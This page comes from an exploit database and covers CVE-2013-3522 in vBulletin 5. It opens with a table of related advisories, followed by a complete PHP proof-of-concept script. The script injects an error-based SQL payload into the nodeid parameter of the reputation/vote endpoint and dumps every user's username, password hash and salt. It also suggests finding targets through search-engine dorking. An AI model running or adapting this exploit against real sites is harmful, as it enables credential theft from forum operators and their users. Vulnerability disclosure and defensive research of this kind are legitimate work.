| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection | 11 Dec 201300:00 | – | zdt | |
| CVE-2013-3522 | 25 Mar 201300:00 | – | circl | |
| vBulletin Nodeid Parameter SQL Injection (CVE-2013-3522) | 5 Jun 201400:00 | – | checkpoint_advisories | |
| CVE-2013-3522 | 10 May 201321:00 | – | cve | |
| CVE-2013-3522 | 10 May 201321:00 | – | cvelist | |
| vBulletin 5.0.0 Beta xx SQL Injection | 10 Apr 201300:00 | – | dsquare | |
| vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit) | 11 Dec 201300:00 | – | exploitdb | |
| vBulletin Password Collector via nodeid SQL Injection | 5 Dec 201321:58 | – | metasploit | |
| vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection | 6 Dec 201319:50 | – | metasploit | |
| CVE-2013-3522 | 10 May 201321:55 | – | nvd |
=============================================================================================================================================
| # Title : vBulletin 5.0.0 Beta 28 SQL Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: SQL Injection Vulnerability in vBulletin 5 Extracts Usernames and Encrypted Data
(Related : https://packetstorm.news/files/id/180631/ Linked CVE numbers: CVE-2013-3522 ) .
[+] save code as poc.php.
[+] Set target : line 70
[+] PayLoad :
<?php
class VBulletinSQLiExploit {
private $target;
private $minNode;
private $maxNode;
public function __construct($target, $minNode = 1, $maxNode = 100) {
$this->target = rtrim($target, '/');
$this->minNode = $minNode;
$this->maxNode = $maxNode;
}
private function sendRequest($data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$this->target/index.php/ajax/api/reputation/vote");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function doSQLi($node, $query) {
$mark = bin2hex(random_bytes(4));
$injection = ") AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT('$mark', ($query), '$mark') FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) a) -- ";
$data = ['nodeid' => "$node$injection"];
$res = $this->sendRequest($data);
if (strpos($res, "Database error in vBulletin") !== false && preg_match("/$mark(.*?)$mark/", $res, $matches)) {
return $matches[1];
}
return null;
}
private function existsNode($id) {
return $this->doSQLi($id, "SELECT '1'") !== null;
}
private function findValidNode() {
for ($i = $this->minNode; $i <= $this->maxNode; $i++) {
if ($this->existsNode($i)) return $i;
}
return null;
}
public function exploit() {
echo "[+] Searching for a valid node...\n";
$node = $this->findValidNode();
if (!$node) {
echo "[-] No valid node found.\n";
return;
}
echo "[+] Using Node ID: $node\n";
$userCount = $this->doSQLi($node, "SELECT COUNT(*) FROM user");
echo "[+] Found $userCount users.\n";
for ($i = 0; $i < $userCount; $i++) {
$username = $this->doSQLi($node, "SELECT username FROM user LIMIT $i,1");
$password = $this->doSQLi($node, "SELECT password FROM user LIMIT $i,1");
$salt = $this->doSQLi($node, "SELECT salt FROM user LIMIT $i,1");
echo "[*] User: $username | Hash: $password | Salt: $salt\n";
}
}
}
$exploit = new VBulletinSQLiExploit("http://target.com");
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation